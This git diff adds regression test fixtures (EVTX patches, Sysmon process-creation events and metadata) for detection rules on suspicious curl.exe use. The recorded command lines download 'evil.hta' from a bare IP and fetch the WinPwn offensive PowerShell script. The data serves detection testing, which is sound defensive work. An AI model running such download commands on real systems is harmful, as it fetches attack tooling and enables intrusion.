b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx new file mode 100755 index 0000000000000000000000000000000000000000..09038101d2bf9daa9e3a11d0e9b02df54f642b28 GIT binary patch literal 69632 zcmeI0TWnlc6^7S2o*9qFo*BEXDVHX7(o#r>9p7(hK;yB8nA)w|rUWEQm9fY1B=(F| z+fC9)C;}>IAD}!S9*V@}1zJ$wDxs=UrAmmmBB3HKLKTP?5E4>A5ugZ}|KI0qkL}ut zOCR~q=*-!dwbx$zTWhaYKm*Cm#;_@_POVIh+E!HsfZ08gnf`>M8UN;x74MeCS&Vdl<&9pwlduvmo`kI3A9* zC+yR<;YOk>Z~2BogH1#1nONe+T;n!alQxdNkKs-+&G%3-Eg7aLOKm1L+nb;&cHuCGCDx{LZ=Xi?lt2?kn(H z4ICH1ouWx=PXPN2D&LGXp89$-CapN8MTnMR09~{I8Hb0vh%xox)yxhL`a!^xvbKgG zgJ`Mel2Su<8|}xSkS5cTh|RKud_G>BO4$=oNbT{uTI|k-M6S(_BWgtdH&Rs!DpWP`G1~x`L1{1FiOFPzeJIzF0b(~F~EHC9(QWz(9XO# zf+tU5#@X|=1acK8W$%Y@r;xQko>wot~Sg|M+jNVSL^F{TBYVneAu((y65DgeqTAEVp?ohG z#~7BmDyCrC+Z>Ii&lzXjt+Bm{tt}sBTOz4Fy*&k8=iSb#M+edhhCVN0`k; zN0E>8Pt+}FLyU5t@pU93#yrL38tuAhd_Ib-zIX+kGhRUsk;QeFVV}=z^|Lq3GM~cA z`{I%9^^qwgB)$sqrDzQ{wndVA+BgGAPdJJke+1Nd+!65@h-Y%gX|%)g*kSvPkJfi* zw7z|IXMODUU3Aw0?cFb?+N1IG1*76nolItjz5Y-Lvmd~SgfY#8NabB|T4%~1Mj7#A z55)Hg*B96`c#h+~-__wo92b~UmC9t*4wqCOhSb-LHiUK>D8??IX0J=TF&&_T%b z;dOKr^%2ZJf_eMw@O|G7{#qWbT<1XnT}#7;<8stycbyQkJ6>q|pm`R%gy-Qhbd}xd zKa5fjX5u$b@iON1G99rD>rBsIaCz!rQeMXi=<~1TYp{_o=Dx2BQCQwlk8JY&9T?k* zPtDCAy$W=|3hsMmoGPrQ?m5UEeb+1`+2!bUf$Sj4L++KH?+o*HF@BwA?)6%Z#uUB( z*TCyCW?#T;ODGqR5m&bkt65~L8ZTvmI zfbulf#~C+}A*M0gfStzo7(Tstb|VJ5@#GH`Mgv>NP#S?;2^KPDhEN*E;ahUiGJ@v` zM8X;LGR6j>Z`jEXI6Vc#*8pz*>?xo$0t&qt-3L8GD3wquqBMx!34Hk74-I^dqnFXs z4I4P37wtt???c}ZWcr=Vfb#<_?T7vz*fWW>%{ZHA*=daIaWeh*9)lGF&{DvhgKiCc z_F#rFv=%WZXN;cxPNK){iPam!mFHW@Gi@&*s~vn#tbn-R5k3me!N!MS{Ug{_k2}BC zf8P1Mv~%1+JWuOz@prN=5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z M5fA|p_!f>Hq)$ literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json new file mode 100644 index 000000000..e4493b612 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:34:20.042883Z" + } + }, + "EventRecordID": 21588, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:34:19.983", + "ProcessGuid": "0197231E-65EB-693A-F112-000000000800", + "ProcessId": 14440, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --output benign.hta \"https://12.34.56.78/hack/evil.hta\"", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml new file mode 100644 index 000000000..2b8c8c48d --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml @@ -0,0 +1,13 @@ +id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 + title: Suspicious File Download From IP Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx new file mode 100755 index 0000000000000000000000000000000000000000..bd24a3fd76ab500f06bbea9b078f319312d873cc GIT binary patch literal 69632 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 VfCz|y2#A0Ph=2%)!2bb({{U|hbjbh! literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json new file mode 100644 index 000000000..febe17014 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:41:38.130858Z" + } + }, + "EventRecordID": 21642, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:41:38.096", + "ProcessGuid": "0197231E-67A2-693A-FF12-000000000800", + "ProcessId": 9656, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml new file mode 100644 index 000000000..56af37248 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml @@ -0,0 +1,13 @@ +id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb + title: Suspicious File Download From File Sharing Domain Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx new file mode 100755 index 0000000000000000000000000000000000000000..7ec40b98863be39f47a0da515a406fe04c7a3653 GIT binary patch literal 69632 zcmeI0O>A6O701teGxIziduHsmra+sJq)b%`fb$cpm}I z^YX*@J-JovKxCH7n*B3l_Sf{*9lBVI2kA z^nXX&;Bw>2AA({KSZDCo>A(NL&&2Xa{`S(NNB;ENH`ib3e))N2kpiu%`aM^}>0*NYjuYKyjj&J}cIf|AWcY}J#?(XCbK5-V2LVrH-Kijl zXldn=S}MPV_M=cplW9pzJ}l%cM_Zo3AfFJv|Bnu;4JZ2ry*CXB|AL#cFxMs zxC+A=Evr~*thdl+#fV9PZZG|!+cH&N`~ zv$O-=G}@B;O?wivmms);Phv&ZvJq1&UHi;f7KG;$wjMyC-Lk2m%Y_q@F|V&8L@SV- zK_E4q-E>-)1?ga8;~@wztI=_%n^^~H5urfi;=K}Pf=-z5G{$pd^Nw}RqJ^x-p~5HO z@AYNjPP%0cmcE~Xw!0vT&~rB;6$e(limdfm z*1FM)5J!o3)^bh`!(DqnYF$>evv?k8KkT&l)6mv^Ui?O<+3QgHoeORdGFU8=;nY*G zd3&`QLPvin8Gmm}x(%*e1u?&E!#pga zY;Pj#Tpw%h*b&q|v4;83iX3w^8FODt|Nm};Sqt+i%ToSuB2Vup)@Kk>Ja{g{{xFX) z+S8UAXmgd@6K$B!++s`>@;u%c*~^>$3iHt|_{4|LESNH}g!#5x$TCZD^KqwMgKRdI zJ(;YNe3Er`A#P~JW!z23FPLACKgq&;`z=-y&qPv;>`AAE#IT`AY}XkpZcj6Z^1Yyn zF)VXcOu@9bBOXnkGtRhM6MNH}TRzNp#!|a_dlI@XyPegF4x~}qv}^RWq5zyjsSInc7%;b*Kc!w3S!}b~bizXv1I#xxTmmG>oSohg45WyFs? znB2!*Ux4Tj5Rn01SK=dp#|7mndkk5U#{%mksGmyYdfjX1pp}r*2TN+4PPRVtU&P%@9UTW0&weT!5~+JN-vd z8gRM?+$mniyk6!|BEve<^A}y7;#t4Hl-F?_`uuD83T)(yx$o;k6xO%ZW1D>cA&l+C zhx>$*aXaVs8e@GN#kb~VXP z+NLq)r5Z{Vlt$1yfe*ijp@GjTdKn4*uz@26(Oz-&A@rSu%&?Owp>G(yt=ZISap97d-9IX}1$rY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY mKmYKmYKmch{dRAiq literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json new file mode 100644 index 000000000..9b6dad729 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:43:20.070938Z" + } + }, + "EventRecordID": 21651, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:43:20.052", + "ProcessGuid": "0197231E-6808-693A-0413-000000000800", + "ProcessId": 17792, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --insecure http://example.com", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml new file mode 100644 index 000000000..1fbe99a15 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml @@ -0,0 +1,13 @@ +id: ef93f624-2b41-41ee-9596-298d3158acfb +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec + title: Insecure Transfer Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx new file mode 100755 index 0000000000000000000000000000000000000000..90ebbbd66af84dbb89394ab66812905c393b6c7a GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json new file mode 100644 index 000000000..69e332233 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:45:56.284330Z" + } + }, + "EventRecordID": 21680, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:45:56.239", + "ProcessGuid": "0197231E-68A4-693A-0713-000000000800", + "ProcessId": 13700, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml new file mode 100644 index 000000000..9014d90aa --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml @@ -0,0 +1,13 @@ +id: 11dd9a12-467e-4c13-b928-7c3aea60f59f +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 + title: Insecure Proxy/DOH Transfer Via Curl.EXE 